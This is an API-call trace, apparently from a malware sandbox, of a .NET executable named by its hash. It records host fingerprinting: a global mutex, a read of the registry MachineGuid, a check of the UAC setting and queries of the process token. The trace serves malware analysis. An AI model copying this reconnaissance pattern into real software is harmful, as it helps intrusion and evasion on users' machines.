[0200.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Windows.Forms\\2.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", nBufferLength=0x105, lpBuffer=0x19e99c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Windows.Forms\\2.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", lpFilePart=0x0) returned 0x64
[0200.772] GetLastError () returned 0x6
[0200.777] IsAppThemed () returned 0x1
[0200.779] CoTaskMemAlloc (cb=0xca) returned 0x66f7e8
[0200.779] CreateActCtxA (pActCtx=0x673930) returned 0x67aefc
[0200.794] CoTaskMemFree (pv=0x66f7e8)
[0200.834] GetCurrentActCtx (in: lphActCtx=0x19f3a4 | out: lphActCtx=0x19f3a4*=0x0) returned 1
[0200.835] ActivateActCtx (in: hActCtx=0x67aefc, lpCookie=0x19f3b0 | out: hActCtx=0x67aefc, lpCookie=0x19f3b0) returned 1
[0200.861] GetCurrentActCtx (in: lphActCtx=0x19f1ec | out: lphActCtx=0x19f1ec*=0x67aefc) returned 1
[0200.868] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0200.868] CreateWindowExW (dwExStyle=0x10000, lpClassName="WindowsForms10.Window.8.app.0.378734a", lpWindowName=0x0, dwStyle=0x22cf0000, X=-2147483648, Y=-2147483648, nWidth=300, nHeight=300, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x4024a
[0200.873] SetWindowLongW (hWnd=0x4024a, nIndex=-4, dwNewLong=1999548128) returned 33687698
[0200.874] GetWindowLongW (hWnd=0x4024a, nIndex=-4) returned 1999548128
[0200.875] SetWindowLongW (hWnd=0x4024a, nIndex=-4, dwNewLong=33688066) returned 1999548128
[0200.875] GetWindowLongW (hWnd=0x4024a, nIndex=-4) returned 33688066
[0200.875] GetWindowLongW (hWnd=0x4024a, nIndex=-16) returned 651100160
[0200.886] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x81, wParam=0x0, lParam=0x19ebe0) returned 0x1
[0200.894] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x83, wParam=0x0, lParam=0x19ebcc) returned 0x0
[0200.903] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x1, wParam=0x0, lParam=0x19ebe0) returned 0x0
[0200.903] GetClientRect (in: hWnd=0x4024a, lpRect=0x19e8f0 | out: lpRect=0x19e8f0) returned 1
[0200.903] GetWindowRect (in: hWnd=0x4024a, lpRect=0x19e8f0 | out: lpRect=0x19e8f0) returned 1
[0200.932] GetWindowTextLengthW (hWnd=0x4024a) returned 0
[0200.932] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0
[0200.932] GetSystemMetrics (nIndex=42) returned 0
[0200.933] GetWindowTextW (in: hWnd=0x4024a, lpString=0x673950, nMaxCount=1 | out: lpString="") returned 0
[0200.933] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0xd, wParam=0x1, lParam=0x673950) returned 0x0
[0200.959] GetProcessWindowStation () returned 0xd0
[0200.960] GetUserObjectInformationA (in: hObj=0xd0, nIndex=1, pvInfo=0x247aa38, nLength=0xc, lpnLengthNeeded=0x19e7ec | out: pvInfo=0x247aa38, lpnLengthNeeded=0x19e7ec) returned 1
[0200.960] GetLastError () returned 0x0
[0200.961] SetConsoleCtrlHandler (HandlerRoutine=0x2020b3a, Add=1) returned 1
[0200.961] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0200.962] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0200.964] GetClassInfoW (in: hInstance=0x400000, lpClassName=".NET-BroadcastEventWindow.2.0.0.0.378734a.0", lpWndClass=0x247aa80 | out: lpWndClass=0x247aa80) returned 0
[0200.971] CoTaskMemAlloc (cb=0x58) returned 0x661d98
[0200.971] RegisterClassW (lpWndClass=0x673968) returned 0xc150
[0200.971] GetLastError () returned 0x583
[0200.971] CoTaskMemFree (pv=0x661d98)
[0200.972] CreateWindowExW (dwExStyle=0x0, lpClassName=".NET-BroadcastEventWindow.2.0.0.0.378734a.0", lpWindowName=".NET-BroadcastEventWindow.2.0.0.0.378734a.0", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x4022c
[0200.974] NtdllDefWindowProc_W (hWnd=0x4022c, Msg=0x81, wParam=0x0, lParam=0x19e260) returned 0x1
[0200.975] NtdllDefWindowProc_W (hWnd=0x4022c, Msg=0x83, wParam=0x0, lParam=0x19e24c) returned 0x0
[0200.976] NtdllDefWindowProc_W (hWnd=0x4022c, Msg=0x1, wParam=0x0, lParam=0x19e260) returned 0x0
[0200.976] NtdllDefWindowProc_W (hWnd=0x4022c, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0
[0200.976] NtdllDefWindowProc_W (hWnd=0x4022c, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0
[0200.976] GetLastError () returned 0x7f
[0201.006] GetStartupInfoW (in: lpStartupInfo=0x247b1d4 | out: lpStartupInfo=0x247b1d4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0))
[0201.015] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x46, wParam=0x0, lParam=0x19ebf4) returned 0x0
[0201.015] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x83, wParam=0x1, lParam=0x19ebcc) returned 0x0
[0201.037] GetWindowPlacement (in: hWnd=0x4024a, lpwndpl=0x19e974 | out: lpwndpl=0x19e974) returned 1
[0201.039] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x47, wParam=0x0, lParam=0x19ebf4) returned 0x0
[0201.039] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x3, wParam=0x0, lParam=0x83008300) returned 0x0
[0201.039] GetClientRect (in: hWnd=0x4024a, lpRect=0x19e3cc | out: lpRect=0x19e3cc) returned 1
[0201.039] GetWindowRect (in: hWnd=0x4024a, lpRect=0x19e3cc | out: lpRect=0x19e3cc) returned 1
[0201.040] GetWindowTextLengthW (hWnd=0x4024a) returned 0
[0201.040] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0
[0201.040] GetSystemMetrics (nIndex=42) returned 0
[0201.040] GetWindowTextW (in: hWnd=0x4024a, lpString=0x673950, nMaxCount=1 | out: lpString="") returned 0
[0201.040] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0xd, wParam=0x1, lParam=0x673950) returned 0x0
[0201.071] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x5, wParam=0x1, lParam=0x0) returned 0x0
[0201.073] GetClientRect (in: hWnd=0x4024a, lpRect=0x19e918 | out: lpRect=0x19e918) returned 1
[0201.073] GetWindowRect (in: hWnd=0x4024a, lpRect=0x19e918 | out: lpRect=0x19e918) returned 1
[0201.087] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x0
[0201.087] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x7f, wParam=0x0, lParam=0x0) returned 0x0
[0201.087] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x7f, wParam=0x1, lParam=0x0) returned 0x0
[0201.088] GetLastError () returned 0xb7
[0201.089] GetParent (hWnd=0x4024a) returned 0x0
[0201.091] GetStockObject (i=5) returned 0x1900015
[0201.091] GetLastError () returned 0xb7
[0201.092] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0201.092] CoTaskMemAlloc (cb=0x4c) returned 0x5f23b8
[0201.092] RegisterClassW (lpWndClass=0x673948) returned 0xc1d7
[0201.093] GetLastError () returned 0xb7
[0201.093] CoTaskMemFree (pv=0x5f23b8)
[0201.093] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0201.093] CreateWindowExW (dwExStyle=0x80, lpClassName="WindowsForms10.Window.0.app.0.378734a", lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x801e2
[0201.094] SetWindowLongW (hWnd=0x801e2, nIndex=-4, dwNewLong=1999548128) returned 33688474
[0201.094] GetWindowLongW (hWnd=0x801e2, nIndex=-4) returned 1999548128
[0201.094] SetWindowLongW (hWnd=0x801e2, nIndex=-4, dwNewLong=33688522) returned 1999548128
[0201.095] GetWindowLongW (hWnd=0x801e2, nIndex=-4) returned 33688522
[0201.095] GetWindowLongW (hWnd=0x801e2, nIndex=-16) returned 79691776
[0201.097] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x24, wParam=0x0, lParam=0x19ec14) returned 0x0
[0201.098] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x81, wParam=0x0, lParam=0x19ec08) returned 0x1
[0201.098] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x83, wParam=0x0, lParam=0x19ebf4) returned 0x0
[0201.100] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x1, wParam=0x0, lParam=0x19ec08) returned 0x0
[0201.100] GetLastError () returned 0x0
[0201.101] SetWindowLongW (hWnd=0x4024a, nIndex=-8, dwNewLong=524770) returned 0
[0201.286] GetSystemMetrics (nIndex=11) returned 32
[0201.286] GetLastError () returned 0x0
[0201.286] GetSystemMetrics (nIndex=12) returned 32
[0201.286] GetLastError () returned 0x0
[0201.287] GetDC (hWnd=0x0) returned 0x4010197
[0201.287] GetLastError () returned 0x0
[0201.292] GetDeviceCaps (hdc=0x4010197, index=12) returned 32
[0201.292] GetLastError () returned 0x0
[0201.292] GetDeviceCaps (hdc=0x4010197, index=14) returned 1
[0201.292] GetLastError () returned 0x0
[0201.295] ReleaseDC (hWnd=0x0, hDC=0x4010197) returned 1
[0201.295] GetLastError () returned 0x0
[0201.297] CreateIconFromResourceEx (presbits=0x247df78, dwResSize=0x10a8, fIcon=1, dwVer=0x30000, cxDesired=0, cyDesired=0, Flags=0x0) returned 0xd00a9
[0201.298] GetLastError () returned 0x0
[0201.299] GetSystemMetrics (nIndex=49) returned 16
[0201.299] GetSystemMetrics (nIndex=50) returned 16
[0201.300] CreateIconFromResourceEx (presbits=0x247f054, dwResSize=0x468, fIcon=1, dwVer=0x30000, cxDesired=0, cyDesired=0, Flags=0x0) returned 0x901ab
[0201.301] GetLastError () returned 0x0
[0201.303] SendMessageW (hWnd=0x4024a, Msg=0x80, wParam=0x0, lParam=0x901ab) returned 0x0
[0201.303] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x80, wParam=0x0, lParam=0x901ab) returned 0x0
[0201.303] SendMessageW (hWnd=0x4024a, Msg=0x80, wParam=0x1, lParam=0xd00a9) returned 0x0
[0201.303] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x80, wParam=0x1, lParam=0xd00a9) returned 0x0
[0201.304] GetSystemMenu (hWnd=0x4024a, bRevert=0) returned 0x40273
[0201.335] GetWindowPlacement (in: hWnd=0x4024a, lpwndpl=0x19f1f0 | out: lpwndpl=0x19f1f0) returned 1
[0201.337] EnableMenuItem (hMenu=0x40273, uIDEnableItem=0xf020, uEnable=0x1) returned 0
[0201.337] EnableMenuItem (hMenu=0x40273, uIDEnableItem=0xf030, uEnable=0x0) returned 0
[0201.337] EnableMenuItem (hMenu=0x40273, uIDEnableItem=0xf060, uEnable=0x0) returned 0
[0201.337] EnableMenuItem (hMenu=0x40273, uIDEnableItem=0xf120, uEnable=0x0) returned 0
[0201.337] EnableMenuItem (hMenu=0x40273, uIDEnableItem=0xf000, uEnable=0x1) returned 0
[0201.340] SetWindowLongW (hWnd=0x4024a, nIndex=-8, dwNewLong=524770) returned 524770
[0201.344] SendMessageW (hWnd=0x801e2, Msg=0x80, wParam=0x1, lParam=0xd00a9) returned 0x0
[0201.344] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x80, wParam=0x1, lParam=0xd00a9) returned 0x0
[0201.346] GetWindowLongW (hWnd=0x4024a, nIndex=-16) returned 651100160
[0201.346] GetWindowTextLengthW (hWnd=0x4024a) returned 0
[0201.346] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0
[0201.346] GetSystemMetrics (nIndex=42) returned 0
[0201.347] GetWindowTextW (in: hWnd=0x4024a, lpString=0x673930, nMaxCount=1 | out: lpString="") returned 0
[0201.347] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0xd, wParam=0x1, lParam=0x673930) returned 0x0
[0201.347] GetWindowTextLengthW (hWnd=0x4024a) returned 0
[0201.347] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0
[0201.347] GetSystemMetrics (nIndex=42) returned 0
[0201.347] GetWindowTextW (in: hWnd=0x4024a, lpString=0x673930, nMaxCount=1 | out: lpString="") returned 0
[0201.347] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0xd, wParam=0x1, lParam=0x673930) returned 0x0
[0201.347] GetWindowLongW (hWnd=0x4024a, nIndex=-16) returned 651100160
[0201.350] GetWindowLongW (hWnd=0x4024a, nIndex=-20) returned 65792
[0201.356] SetWindowLongW (hWnd=0x4024a, nIndex=-16, dwNewLong=583991296) returned 651100160
[0201.356] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x7c, wParam=0xfffffff0, lParam=0x19f164) returned 0x0
[0201.356] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x7d, wParam=0xfffffff0, lParam=0x19f164) returned 0x0
[0201.357] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x901ab
[0201.363] SetWindowLongW (hWnd=0x4024a, nIndex=-20, dwNewLong=65536) returned 65792
[0201.363] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x7c, wParam=0xffffffec, lParam=0x19f164) returned 0x0
[0201.364] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x7d, wParam=0xffffffec, lParam=0x19f164) returned 0x0
[0201.367] SetWindowPos (hWnd=0x4024a, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1
[0201.368] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x46, wParam=0x0, lParam=0x19f19c) returned 0x0
[0201.368] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x83, wParam=0x1, lParam=0x19f174) returned 0x0
[0201.370] GetWindowPlacement (in: hWnd=0x4024a, lpwndpl=0x19ef1c | out: lpwndpl=0x19ef1c) returned 1
[0201.370] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x47, wParam=0x0, lParam=0x19f19c) returned 0x0
[0201.370] GetClientRect (in: hWnd=0x4024a, lpRect=0x19eec0 | out: lpRect=0x19eec0) returned 1
[0201.370] GetWindowRect (in: hWnd=0x4024a, lpRect=0x19eec0 | out: lpRect=0x19eec0) returned 1
[0201.385] RedrawWindow (hWnd=0x4024a, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1
[0201.397] GetSystemMenu (hWnd=0x4024a, bRevert=0) returned 0x40273
[0201.397] GetWindowPlacement (in: hWnd=0x4024a, lpwndpl=0x19f1d4 | out: lpwndpl=0x19f1d4) returned 1
[0201.397] EnableMenuItem (hMenu=0x40273, uIDEnableItem=0xf020, uEnable=0x1) returned 1
[0201.397] EnableMenuItem (hMenu=0x40273, uIDEnableItem=0xf030, uEnable=0x0) returned 0
[0201.397] EnableMenuItem (hMenu=0x40273, uIDEnableItem=0xf060, uEnable=0x0) returned 0
[0201.397] EnableMenuItem (hMenu=0x40273, uIDEnableItem=0xf120, uEnable=0x0) returned 0
[0201.397] EnableMenuItem (hMenu=0x40273, uIDEnableItem=0xf000, uEnable=0x1) returned 1
[0201.398] ShowWindow (hWnd=0x4024a, nCmdShow=2) returned 0
[0201.398] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x46, wParam=0x0, lParam=0x19f254) returned 0x0
[0201.435] GetWindowPlacement (in: hWnd=0x4024a, lpwndpl=0x19efd4 | out: lpwndpl=0x19efd4) returned 1
[0201.435] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x47, wParam=0x0, lParam=0x19f254) returned 0x0
[0201.435] GetClientRect (in: hWnd=0x4024a, lpRect=0x19ef78 | out: lpRect=0x19ef78) returned 1
[0201.435] GetWindowRect (in: hWnd=0x4024a, lpRect=0x19ef78 | out: lpRect=0x19ef78) returned 1
[0201.464] GetWindowTextLengthW (hWnd=0x4024a) returned 0
[0201.464] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0
[0201.464] GetSystemMetrics (nIndex=42) returned 0
[0201.464] GetWindowTextW (in: hWnd=0x4024a, lpString=0x673930, nMaxCount=1 | out: lpString="") returned 0
[0201.464] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0xd, wParam=0x1, lParam=0x673930) returned 0x0
[0201.467] SendMessageW (hWnd=0x4024a, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0
[0201.474] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0
[0201.492] GetWindowThreadProcessId (in: hWnd=0x4024a, lpdwProcessId=0x19ef34 | out: lpdwProcessId=0x19ef34) returned 0xce0
[0201.492] GetCurrentThreadId () returned 0xce0
[0201.493] RegisterClipboardFormatW (lpszFormat="WindowsForms12_ThreadCallbackMessage") returned 0xc1c5
[0201.494] PostMessageW (hWnd=0x4024a, Msg=0xc1c5, wParam=0x0, lParam=0x0) returned 1
[0201.501] OleInitialize (pvReserved=0x0) returned 0x0
[0201.502] GetLastError () returned 0x6
[0201.502] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x19f348 | out: lplpMessageFilter=0x19f348*=0x0) returned 0x0
[0201.525] PeekMessageW (in: lpMsg=0x19f320, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f320) returned 1
[0201.534] IsWindowUnicode (hWnd=0x4024a) returned 1
[0201.539] GetMessageW (in: lpMsg=0x19f320, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19f320) returned 1
[0201.566] TranslateMessage (lpMsg=0x19f320) returned 0
[0201.567] DispatchMessageW (lpMsg=0x19f320) returned 0x0
[0201.567] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x31f, wParam=0x1, lParam=0x0) returned 0x0
[0201.568] PeekMessageW (in: lpMsg=0x19f320, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f320) returned 1
[0201.568] IsWindowUnicode (hWnd=0x801e2) returned 1
[0201.568] GetMessageW (in: lpMsg=0x19f320, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19f320) returned 1
[0201.569] TranslateMessage (lpMsg=0x19f320) returned 0
[0201.569] DispatchMessageW (lpMsg=0x19f320) returned 0x0
[0201.569] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x31f, wParam=0x1, lParam=0x0) returned 0x0
[0201.569] PeekMessageW (in: lpMsg=0x19f320, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f320) returned 1
[0201.569] IsWindowUnicode (hWnd=0x4024a) returned 1
[0201.569] GetMessageW (in: lpMsg=0x19f320, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19f320) returned 1
[0201.569] TranslateMessage (lpMsg=0x19f320) returned 0
[0201.569] DispatchMessageW (lpMsg=0x19f320) returned 0x0
[0201.582] GetFocus () returned 0x0
[0201.583] ShowWindow (hWnd=0x4024a, nCmdShow=0) returned 1
[0201.583] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0
[0201.583] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x46, wParam=0x0, lParam=0x19e9bc) returned 0x0
[0201.587] GetWindowPlacement (in: hWnd=0x4024a, lpwndpl=0x19e73c | out: lpwndpl=0x19e73c) returned 1
[0201.587] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x47, wParam=0x0, lParam=0x19e9bc) returned 0x0
[0201.587] GetClientRect (in: hWnd=0x4024a, lpRect=0x19e6e0 | out: lpRect=0x19e6e0) returned 1
[0201.587] GetWindowRect (in: hWnd=0x4024a, lpRect=0x19e6e0 | out: lpRect=0x19e6e0) returned 1
[0201.588] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x5, wParam=0x1, lParam=0x0) returned 0x0
[0201.588] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x3, wParam=0x0, lParam=0x83008300) returned 0x0
[0201.588] GetClientRect (in: hWnd=0x4024a, lpRect=0x19e720 | out: lpRect=0x19e720) returned 1
[0201.588] GetWindowRect (in: hWnd=0x4024a, lpRect=0x19e720 | out: lpRect=0x19e720) returned 1
[0201.600] strncat_s (in: _Destination="System.Collections.Generic", _SizeInBytes=0x29, _Source=".", _MaxCount=0xffffffff | out: _Destination="System.Collections.Generic.") returned 0x0
[0201.629] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x673930, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe")) returned 0x62
[0201.629] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x105, lpBuffer=0x19e598, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x0) returned 0x1d
[0201.629] GetLastError () returned 0x0
[0201.630] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x105, lpBuffer=0x19e600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x0) returned 0x1d
[0201.630] GetLastError () returned 0x0
[0201.630] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1
[0201.630] GetLastError () returned 0x0
[0201.662] FindResourceExA (hModule=0x0, lpType=0xa, lpName=0x1, wLanguage=0x0) returned 0x422048
[0201.663] LoadResource (hModule=0x0, hResInfo=0x422048) returned 0x422058
[0201.663] SizeofResource (hModule=0x0, hResInfo=0x422048) returned 0x15d20
[0201.664] LockResource (hResData=0x422058) returned 0x422058
[0201.689] GetVersionExW (in: lpVersionInformation=0x673948*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x673948*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
[0201.689] GetLastError () returned 0x0
[0202.244] BCryptGetFipsAlgorithmMode (in: pfEnabled=0x19e994 | out: pfEnabled=0x19e994) returned 0x0
[0202.596] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", nBufferLength=0x105, lpBuffer=0x19d2c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", lpFilePart=0x0) returned 0x62
[0202.596] GetLastError () returned 0x0
[0202.657] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", nBufferLength=0x105, lpBuffer=0x19d284, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", lpFilePart=0x0) returned 0x62
[0202.657] GetLastError () returned 0x0
[0202.724] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="Global\\{9358a53f-433c-42f5-bd3f-14ae4da528cf}") returned 0x2d4
[0202.725] GetLastError () returned 0x0
[0202.730] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Cryptography", ulOptions=0x0, samDesired=0x20119, phkResult=0x19ea6c | out: phkResult=0x19ea6c*=0x2d8) returned 0x0
[0202.731] RegQueryValueExA (in: hKey=0x2d8, lpValueName="MachineGuid", lpReserved=0x0, lpType=0x19ea64, lpData=0x0, lpcbData=0x19ea68*=0x0 | out: lpType=0x19ea64*=0x1, lpData=0x0, lpcbData=0x19ea68*=0x25) returned 0x0
[0202.731] RegQueryValueExA (in: hKey=0x2d8, lpValueName="MachineGuid", lpReserved=0x0, lpType=0x19ea64, lpData=0x673918, lpcbData=0x19ea68*=0x25 | out: lpType=0x19ea64*=0x1, lpData="03845cb8-7441-4a2f-8c0f-c90408af5778", lpcbData=0x19ea68*=0x25) returned 0x0
[0202.732] RegCloseKey (hKey=0x2d8) returned 0x0
[0202.735] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea14 | out: phkResult=0x19ea14*=0x2d8) returned 0x0
[0202.735] RegQueryValueExW (in: hKey=0x2d8, lpValueName="EnableLUA", lpReserved=0x0, lpType=0x19ea50, lpData=0x0, lpcbData=0x19ea4c*=0x0 | out: lpType=0x19ea50*=0x4, lpData=0x0, lpcbData=0x19ea4c*=0x4) returned 0x0
[0202.736] RegQueryValueExW (in: hKey=0x2d8, lpValueName="EnableLUA", lpReserved=0x0, lpType=0x19ea50, lpData=0x19ea3c, lpcbData=0x19ea4c*=0x4 | out: lpType=0x19ea50*=0x4, lpData=0x19ea3c*=0x1, lpcbData=0x19ea4c*=0x4) returned 0x0
[0202.742] GetVersionExW (in: lpVersionInformation=0x673948*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x673948*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
[0202.742] GetLastError () returned 0x0
[0202.743] GetCurrentProcess () returned 0xffffffff
[0202.743] GetLastError () returned 0x3f0
[0202.744] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e9e0 | out: TokenHandle=0x19e9e0*=0x2dc) returned 1
[0202.744] GetLastError () returned 0x3f0
[0202.746] GetTokenInformation (in: TokenHandle=0x2dc, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x19ea38 | out: TokenInformation=0x0, ReturnLength=0x19ea38) returned 0
[0202.746] GetLastError () returned 0x7a
[0202.747] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x685928
[0202.747] GetLastError () returned 0x7a
[0202.747] GetTokenInformation (in: TokenHandle=0x2dc, TokenInformationClass=0x8, TokenInformation=0x685928, TokenInformationLength=0x4, ReturnLength=0x19ea38 | out: TokenInformation=0x685928, ReturnLength=0x19ea38) returned 1
[0202.747] GetLastError () returned 0x7a
